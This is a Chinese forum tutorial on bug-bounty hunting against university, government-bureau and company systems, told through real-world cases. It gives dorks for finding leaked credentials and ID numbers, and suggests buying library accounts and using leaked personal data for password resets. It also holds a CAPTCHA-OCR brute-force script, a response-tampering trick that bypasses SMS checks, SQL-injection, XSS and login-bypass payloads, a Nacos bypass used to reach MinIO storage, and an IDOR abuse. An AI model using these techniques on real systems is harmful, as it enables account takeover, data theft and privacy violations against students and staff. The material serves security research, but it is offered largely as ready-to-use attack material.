问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
一文带你看懂从脆弱资产收集到SRC通杀案例技术分享
渗透测试
这篇文章以开头从脆弱资产的视角带师傅们了解信息收集的思路和方法.同时这篇文章介绍了人社和中国科学院相关漏洞的收集方法和EDU平台的收录规则,以及语雀的公开知识库。后面以企业SRC的SQL排序注入和云安全Minio渗透测试给师傅们很详细的以真实案例来进行分享。
0x1 前言 ------ 这篇文章以开头从脆弱资产的视角带师傅们了解信息收集的思路和方法,通过多种方法很详细的给师傅们介绍了,主要是以EDUSRC的资产收集姿势来分享。同时这篇文章介绍了人社和中国科学院相关漏洞的收集方法和EDU平台的收录规则,以及语雀的公开知识库去收集一些操作手册,泄露的一些账户密码等。 后面以企业SRC的SQL排序注入和云安全Minio渗透测试给师傅们很详细的以真实案例来进行分享,针对云安全Minio的漏洞测试的文章不多,这篇文章的案例都很全。最后面拿了前段时间挖的EDUSRC的通杀漏洞进行介绍。 0x2 脆弱资产收集 ---------- ### 一、通过搜索引擎搜索关键字 #### 1、EDU资产 简单给师傅们介绍几个关键字,比如:操作手册/使用手册/操作视频/使用视频/演示视频/白皮书,通过上面的搜索关键字,很容易搜索到EDU学校相关脆弱资产,语法使用如下: ```php site:edu.cn intext:操作手册|使用手册|操作视频|使用视频|演示视频|白皮书 ```  就很容易找到很多系统操作使用手册。  也就是下面的账号密码,有些操作手册都会直接泄露测试账号和密码,且系统没有及时删除对应的测试账号,从而导致一个漏洞危害操作。  #### 2、人社关键字 - 人社部门概述 人社部门是指人力资源与社会保障部、人力资源与社会保障厅、人力资源与社会保障局等机构,通常简称为人社部、人社厅、人社局。 - 人社部门管理的学校 人社部门管理的学校通常为技工学校、技师学院。判断某所学校是否属于人社部门管理,可以通过搜索引擎查询“学校名称 隶属于”来获取相关参考信息,如搜索结果中显示某学校隶属于人社部门,即可确认其为收录范围内的学校。  这里再给师傅们分享一些人社相关搜索关键字,主要用于测试微信小程序的漏洞: ```php 就业训练 劳动就业服务管理中心 高级技工学校 信息采集 人才培养 劳动保障 社会保险 劳动维权 职业介绍 公共就业 创业 人事 仲裁 社会保险 劳动就业服务局 社会保障中心 城乡居民养老保险中心 人才交流开发中心 劳动监察大队 职业技能鉴定中心 机关服务中心 创业担保贷款基金管理中心 创业指导中心 乡镇劳动就业社会保障服务中心 信息和考试中心 ``` 接下来就可以进行测试相关人社的漏洞,并提交到对应的漏洞到EDUSRC平台即可。  #### 3、中国科学院关键字 这个中国科学院单位也是今年新加入的单位,很多小伙伴师傅们还不知道,下面就给师傅们简单介绍下。  主要是以ac.cn和cas.cn两个主域名为主,再配合下面的搜索关键词语法进行检索脆弱资产。 ```php //中国科学院 site:ac.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书 site:cas.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书 ```  ### 二、语雀公开知识库搜索 关键字还是可以配合下面的来使用,搜索语雀公开的知识库文档。 ```php 操作手册/使用手册/操作视频/使用视频/演示视频/白皮书 ```  这里我给师傅们总结下通过上面搜索到的EDU后台系统登陆默认的一个密码。 ```php EDU默认密码:111111、000000、123123、123456、654321、666666、身份证后六位 ```  ### 三、SRC万能Google语法&懒人网站分享 #### 1、Google黑客语法 收到信息收集和资产收集怎么可能少的了Google浏览器呢,很多大牛都是使用一些厉害的Google语法进行一个资产的收集,在以前学校的一些`身份证`和`学号`信息经常能够利用这些语法找到的。 下面我也简单的给师傅们整理了下一些常见的一些`Google检索的语法`,如下: ```php 注入漏洞: site:edu.cn inurl:id|aspx|jsp|php|asp 文件上传: site:edu.cn inurl:file|load|editor|Files 前台登录: site:edu.cn intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|手册|admin|login|sys|managetem|password|username site:edu.cn inurl:login|admin|manage|manager|admin_login|login_admin|system|boss|master 敏感信息搜索: site:edu.cn ( "默认密码" OR "学号" OR "工号") site:edu.cn "账号、密码、学号"&"附件" 后台接口和敏感信息探测: site:edu.cn (inurl:login OR inurl:admin OR inurl:index OR inurl:登录) OR (inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php) 查找暴露的特殊文件: site:edu.cn filetype:txt OR filetype:xls OR filetype:xlsx OR filetype:doc OR filetype:docx OR filetype:pdf 已公开的 XSS 和重定向漏洞: site:openbugbounty.org inurl:reports intext:edu.cn 常见的敏感文件扩展: site:edu.cn ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess XSS 漏洞倾向参数: inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:edu.cn 重定向漏洞倾向参数: inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:edu.cn SQL 注入倾向参数: inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:edu.cn SSRF 漏洞倾向参数: inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:edu.cn 本地文件包含(LFI)倾向参数: inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:edu.cn 远程命令执行(RCE)倾向参数: inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:edu.cn 敏感参数: inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:edu.cn API 文档: inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:edu.cn 代码泄露: site:pastebin.com edu.cn 云存储: site:s3.amazonaws.com edu.cn JFrog Artifactory: site:jfrog.io edu.cn Firebase: site:firebaseio.com edu.cn 文件上传端点: site:edu.cn "choose file" 漏洞赏金和漏洞披露程序: "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" site:*/security.txt "bounty" 暴露的 Apache 服务器状态: site:*/server-status apache WordPress: inurl:/wp-admin/admin-ajax.php ``` 其次还有就是我一般喜欢在打开无影探测完的资产后,要是这个域名访问报错,或者没什么信息,我会使用Google语法来访问,有时候可以找到该站点的存活站点,从而打该站点的资产 就比如你访问http://xxxxx.xxx.com这个站点,显示下面的界面报错,一般别人遇到就放弃了  我们可以使用Google浏览器用site:域名尝试,有时候可以找到对应站点的别的访问路径,就不会报错了   最后面给师傅们分享一个搜集EDU资产的FOFA语法,感兴趣的师傅们可以去玩下,搜索出来的资产也蛮多的 ```php org="China Education and Research Network Center" &&("后台"||"登录")&&("中学"||"技术学院"||"小学"||"职业学院"||"中专"||"幼儿园"||"人社局"||"科学院") ```  #### 2、**懒人版,在线网站** 懒人版,在线网站如下: <https://app.pentest-tools.com/scans/new-scan>  这个站点的功能十分强大,但是很多都是需要付费升级的功能里面还有很先进的AI漏洞挖掘分析的功能,但是要付费,里面的免费模块也是蛮不错的, 我下面进行对一个企业src的域名进行子域名挖掘,一分钟的时间就挖掘出来了62个子域名,且使用十分简单  十分可以看到这个侦察工具这里,有一个Google黑客  可以看到里面直接把一些重要的查询功能点都给你列出来了,十分简单,对小白师傅们十分友好  下面的配置文件信息,直接就可以查询到了,不需要你会Google语法,直接使用这个工具你也可以很强大  0x3 统一身份认证绕过 ------------ ### 一、GitHub搜索 像我们平常做一些测试的时候,在对抗登陆框的时候,需要账号密码,可以试试GitHub的爬虫搜索功能。  一些复杂的语法,可以点击这个即可。   这里搜索完,选择代码功能点,师傅们可以看到是不是代码泄露了一些账号密码。  为了减少GitHub搜索的赛选数量,这里可以点击选择语言,一般爬虫python多,然后就是JS泄露账号密码等,所以我一般选择JavsScript和Python语言多点。  对于检索到的账号密码,就可以直接进去后台系统登陆操作了,后台的漏洞也好测试。   ### 二、闲鱼账号密码购买 这里分享一个网上很少有人知道的方法,具体的操作我这边不做过多的介绍了,直接去某宝、某鱼、pdd平台搜索:高校图书馆。  ### 三、实战案例分享 开局一个教学管理系统平台登陆页面。  这里开始先通过上面的脆弱资产收集,收集到这个教学管理系统平台操作使用手册,且里面泄露了改系统的管理员账号xxadmin,然后我这里直接尝试使用密码和账号一样,直接就登陆教学管理系统,且是管理员的权限。  打EDUSRC的时候,收集到对应学号/工号和身份证等之类的敏感的信息,都可以去找找该学校的统一身份认证管理后台,然后看看他的这个登录机制有没有可以绕过的功能点。  可以看到利用bp抓取数据包,且账号密码都是以明文的形式输入,所以可以尝试爆破的方法。  爆破没有成功,应该是要求改强密码了,不过没有关系,这个也是一个思路,主要是想给师傅们分享下一个在拿到账号的情况下,可以去尝试的操作。  直接点击忘记密码操作,然后把刚才收集到的管理员的工号和身份证号输入,进行输入,点击下一步。  然后这里跳转到使用手机验证码进行验证。  通过bp抓包,然后进行数据包分析。  这里直接右击看看返回包,然后通过返回包看看这个是通过什么方式进行的前端校验,然后进行分析这个返回包,师傅们可以看到这里可以判断下这个前端是通过下面的返回包的哪个字段进行的校验。  一般就是statusCode和这个false错误进行的一个前端校验。后来把false改成true后,statusCode改成200,然后再放包,就直接绕过手机验证码了  到此为止,我们就成功的绕过了改身份认证登录后台的修改密码的验证了,主要还是开始先收集到的学号/工号和身份证敏感信息,然后再进行一个前端绕过的一个判断。 ### 四、密保问题 这里给师傅们分享几个在EDUSRC中,一些简单的密保问题,也就是在统一身份认证过程中忘记密码,后面选择找回方式中,很多学生包括老师都会选择设置密保,来进行修改密码。 第一个案例密保问题就是该学生的学号,这个找回密码验证方式很简单,学号的收集上面的文字中有写,最简单的就是搜索学校的奖学金名单,学号和姓名都会公开的。  第二个案例就是密保问题,输入幸运数字是多少,这个也很简单,密保问题错误次数没有限制,你就可以挨个试试,或者直接爆破,幸运数字,大概率就是那几个,0-10居多  ### 五、统一身份认证逻辑缺陷通杀漏洞 这个案例是EDUSRC的通杀漏洞案例,忘记密码处,存在逻辑缺陷漏洞。  只需要收集网上泄露的姓名、学号、身份证信息。  输入基础信息验证成功之后,就可以重置密码了。  通过JS查找关键字,发现是个通杀漏洞,直接提交即可。  0x4 业务安全漏洞-登录认证实战 ----------------- 这里也师傅们分享之前众测的一个登陆认证的案例,起初打算交一个用户名枚举的漏洞得了,后来想了下这个登陆口可以枚举到存在账户admin,然后就想着花点时间,爆破下,这里之所以开始懒得搞,是因为这个登陆框存在验证码。 通过手工的方式输入账号查看回显信息,在注册页面输入admin用户提示当前用户名已被占用,说明存在admin用户,且可以进行用户名遍历,这里也可以使用手机号登陆,也就是说可以进行手机号爆破遍历账户。  这里尝试爆破图形验证码,再利用账户admin,进行尝试爆破密码。 首先先运行下面的python脚本,脚本如下: ```php # -*- coding:utf-8 -*- # author:f0ngf0ng # @Date: 2022/3/11 下午1:44 import argparse import ddddocr # 导入 ddddocr from aiohttp import web import base64 parser = argparse.ArgumentParser() parser.add_argument("-p", help="http port", default="8888") args = parser.parse_args() ocr = ddddocr.DdddOcr() port = args.p # 将 port 转换为整数类型 try: port = int(port) except ValueError: print("端口号必须是有效的整数,请检查配置。") raise auth_base64 = "f0ngauth" # 可自定义auth认证 async def handle_cb(request): if request.headers.get('Authorization') != 'Basic ' + auth_base64: # 可自定义auth认证,不需要注释就好 return web.Response(text='Forbidden', status='403') print(await request.text()) img_base64 = await request.text() img_bytes = base64.b64decode(img_base64) # return web.Response(text=ocr.classification(img_bytes)[0:4]) 验证码取前四位 # return web.Response(text=ocr.classification(img_bytes)[0:4].replace("0","o")) 验证码取前四位、验证码中的0替换为o return web.Response(text=ocr.classification(img_bytes)[0:4]) app = web.Application() app.add_routes([ web.post('/reg', handle_cb), ]) if __name__ == '__main__': web.run_app(app, port=port) ``` 监听端口8888,自动识别验证码四位数  然后抓取图片验证码的数据包,burpsuit开启抓包,点击图形验证码即可。  然后点击插件进去,直接按照下面的步骤看看能否识别成功。  这里需要注意的是接口URL和下面的脚本,可以直接右击选择ddddocr模版,也可以直接用我的。 ```php POST /reg HTTP/1.1 Host: 127.0.0.1:8888 Authorization:Basic f0ngauth User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 8332 <@BASE64><@IMG_RAW></@IMG_RAW></@BASE64> ```  后面就是爆破了 ,选择Pitchfork模板爆破,账号就是admin,然后添加密码,以及后面需要使用burpsuit插件爆破验证码。  1、是加载字典爆破密码,这里直接使用大家收集的密码字典即可  2、这里选择下面的这个验证码爆破的模块   这里还需要把爆破速度延迟调整下,有些网站太快了会识别图形验证码失败。  然后进行验证码和密码的爆破,这里账号就是开始枚举的admin管理员用户。  最后通过爆破成功登陆进去后台。  0x5 企业SRC SQL排序注入 ----------------- 1、**浅谈:** 在很多web站点中,都提供了对前端界面显示数据的排序功能,而实际中web站点的排序功能基本都是借助SQL语言的order by来实现的,其中的asc为升序排列;desc为降序排列。那么其中大概的SQL语句为SELECT \* FROM users ORDER BY 1 desc/asc;这样。而存在排序注入的话,其中可控的便是desc/asc这个位置。 **2、排序注入的关键字:** DESC、desc、asc、order **3、SQL排序判断判断:** - ,1 - ,0 - ,sleep(5) - ,exp(999) - ,exp(222) **4、实战案例分享**: 这个系统可以通过注册游客账号进去,挨个案例点击查看,我的就业功能点查看。  利用1'进行报错验证该查询功能接口,是否存在SQL注入。  然后抓包,使用burpsuit进行测试SQL排序注入漏洞。 这里我给师傅们分享一个排序注入的报错语句,我在很多场景都适用,没有设置过滤,可以试试下面的语句。 ```php updatexml(1,concat(0x7e,(version()),0x7e),1) extractvalue(1, concat(0x7e, user(), 0x7e)) updatexml(1, concat(0x7c, @@datadir, 0x7c), 1) extractvalue(1, concat(0x2a, @@version, 0x2a)) ``` 上面的这个排序注入就是使用的这个报错语句,直接报错出该系统数据库的版本已经数据库名。   0x6 云安全Minio渗透测试 ---------------- ### 一、Minio简介 - 随着工作和生活中的一些环境逐渐往云端迁移,对象存储的需求也逐渐多了起来,MinIO就是一款支持部署在私有云的开源对象存储系统。MinIO完全兼容AWS S3的协议,也支持作为S3的网关,所以在全球被广泛使用,在Github上已有25k星星。 - MinIO开放默认的9000端口,外部可以访问,地址为`http://192.168.227.131:9000`,但是不知道账号密码. - 在集群模式的配置下,MinIO 部分接口由于信息处理不当返回了所有的环境变量信息(包括 `MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD`),从而导致敏感信息泄漏漏洞,攻击者可能通过获取到的密钥配置信息直接登陆操作 MinIO 接口。 - 我平时会将一些数据部署在MinIO中,在CI、Dockerfile等地方进行使用。 - 感兴趣Minin系统的师傅,可以尝试本地搭建玩下,参考链接:<https://www.cnblogs.com/-k8s/p/17555825.html>  ### 二、Minio渗透测试 开局一个通过dirsearch扫描出来的Nacos目录,直接访问nacos登陆页面。  首先碰到nacos,先尝试下弱口令: ```php 账号:admin、nacos、test 密码:admin、123456、nacos、test ``` 这里弱口令没有成功,直接使用nacos工具一把搜哈即可,大概率都会出漏洞的  直接使用nacos权限绕过漏洞,添加用户成功。  并成功通过注册的用户登陆进去后台。 然后你可以直接在配置列表中的详情里面查看网站的配置信息,然后去挨个找,因为里面都是云安全的一些环境的配置,里面经常会泄露一些云安全的信息key值等,都是可以进行利用的。  后来我在xxxxxxx.yml配置详情里面找到了这个东西,这个也是minio云安全相关的漏洞,下面的url可以访问下,然后要是有回显的话,然后尝试使用下面的access-key和secret-key进行密钥登录。 ```php minio: access-key: xxxxxxxxxxxx secret-key: xxxxxxxxxxxxxxxxxxxxxxxx bucket: xxxxxxxxxx endpoint: http://xxxxxxx:9000 address: http://xxxxxxx:9000 ```  直接访问配置内容里面的Minion对应的address地址,发现是可以正常访问的:  可以看到这里我直接就登录成功了,且里面都是云空间里面的存储东西,下面可以看到里面的日志信息等。   ### 三、mc工具连接Minio 上面的情况是遇到的Minion的URL地址是可以正常访问的,要是遇到访问minio的URL地址,访问不了的情况呢,师傅们就可以尝试下面的这种方法进行连接了,网上很少有相关文章讲解。  选择对应的版本下载即可,mc的下载链接(推荐使用Linux下载使用):<https://www.minio.org.cn/download.shtml#/linux>  Linux下命令: ```php [root@centos7 ~]# wget https://dl.minio.org.cn/client/mc/release/linux-amd64/mc [root@centos7 ~]# chmod +x ./mc [root@centos7 ~]# ./mc --help NAME: mc - MinIO Client for cloud storage and filesystems. .... ``` 使用mc命令连接minion: ```php ./mc alias set myminio minio_address access-key secret-key ```  可以看到已经使用mc成功添加了minio。 还可以进行文件上传和删除操作: ```php parallels@ubuntu-linux-2404:~/Desktop$ ./mc cp 2.png myminio/wechat/ //上传文件 parallels@ubuntu-linux-2404:~/Desktop$ ./mc ls myminio/wechat/ //查看文件 11KiB STANDARD 2.png parallels@ubuntu-linux-2404:~/Desktop$ ./mc rm --force myminio/wechat/2.png //强制删除文件 Removed `myminio/wechat/2.png`. ```  0x7 图书馆通杀漏洞 ----------- 通过FOFA搜索引擎,搜索JS特征,发现存在几十个学校资产通杀漏洞案例。  ### 一、XSS漏洞案例 这个图书馆的通杀漏洞首先是通过上面的统一身份认证缺陷漏洞打进去的,渗透测试就是这样,从一个口子进去以后,就可以发散思维,然后看系统里面的别的漏洞,这也是一个漏洞挖掘的Tips。 这里直接进去,然后测试的一个XSS漏洞案例,这里拿出来分享是因为有些师傅跟我说,自己测试XSS都被WAF给拦截封IP了,觉得很抽象。 其实测试这样的,特别是企业SRC中测试,开始没必要就拿着特别明显的XSS的payload进行测试,这样很容易就被waf设备检测了  可以像上面一样,插入这样的标签,测试存不存在XSS漏洞。 ```php <s>test<s> <h1>test</h1> ``` 下面的自己总结的标签闭合绕过。 ```php </tExtArEa><h1>123</h1># </tExtArEa><s>123#//--+ '"></tExtArEa><s>123#//--+ ``` 下面再给师傅们分享一些自己总结的XSS绕过方法。 ```php 1.大小写绕过 <Script>alert(1);</Script> //数字可以不加单引号 2.双写绕过 <scrscriptipt>alert(1);</scrscriptipt> <script<script>>alert(1);</sc</script>> 3.替换绕过 过滤 alert 用onerror,prompt,confirm,top[alert]代替绕过 <img src="1" onerror="confirm(1)"> <script>confirm(1)</script> <script>prompt(1)</script> <script>top['alert'](1)</script> 4、禁用单引号' <script>confirm(`xss`)</script> <script>confirm(/xss/)</script> 过滤() 用``代替绕过 过滤空格 用%0a(换行符),%0d(回车符),/**/代替绕过 5、过滤script 可以用img、console <img src=0 onerror="alert(1);"/> console.log(Date.now()) //控制台输入 ``` 下面这些功能点都存在一个存储型XSS漏洞,都有一个附件上传功能点。  每个学校系统,都有多个功能点存在这个存储型XSS漏洞,并且成功执行弹窗。   ### 二、越权漏洞案例 这个案例蛮有意思的,且也是一个通杀漏洞案例,一个单独的系统,不需要统一身份认证相关的操作,就是一个图书馆预约座位的系统。开局直接一个图书馆系统,点击里面的一个功能点跳转到图书馆座位预约系统。 直接点击需要登陆账户密码,尝试了一波弱口令没有登陆进去  有登陆口,这再给师傅们分享下登陆口的万能密码payload,这里万能密码没有成功。 ```php admin'# admin'or 1=1-- admin'or' 1=1-- admin"or 1=1-- admin'or''=' admin'OR'1=1%00 admin'and'1'='1'# admin'and'1'='1 admin'and'1'='1# ``` 想着这样的图书馆座位预约,大概率可能存在注册账户、忘记密码等接口,所以这里就尝试了注册接口关键字:register、signup、createAccount等参数发现没有成功找到注册接口。 然后就尝试使用/forget参数,进行实验忘记密码操作,发现成功进入了忘记密码的界面  但是到这里我又发现,姓名和学号蛮好找的,网上奖学金名单,都找到了。  但是忘记重置密码需要使用手机号,这个比较难找啊,这里我想了下,想起之前遇到的案例,有些学生不一定会绑定手机号注册账户,那么这里输入我自己的手机号尝试下,发现跟自己预想的一样,直接重置密码成功了。  然后也是成功登陆进来了。  这里拿账号A预约座位。  然后取消预约,找到取消预约的burpsuit数据包,再使用账号B创建预约座位。  然后拿账号A的数据包,也是可以直接取消预约账号B的以及其他图书馆预约座位。 可以看到这⾥爆破id号,都可以成功取消,且长度都是⼀样的。  返回看下账号B的座位预约都被取消了。  0x8 总结 ------ 这篇文章到这里就结束了,感谢师傅们的观看。师傅们针对上面的一些SRC漏洞可以尝试自己找找,看一万遍不如自己手动挖一遍,写的也都非常的详细了。 也感谢师傅们平常对我文章的支持,希望看到这篇文章的师傅们都有收获,嘎嘎猛,嘎嘎出漏洞!
发表于 2025-11-12 10:00:00
阅读 ( 277 )
分类:
渗透测试
0 推荐
收藏
0 条评论
请先
登录
后评论
routing
微信公众号:神农Sec,VX:routing_love
7 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!
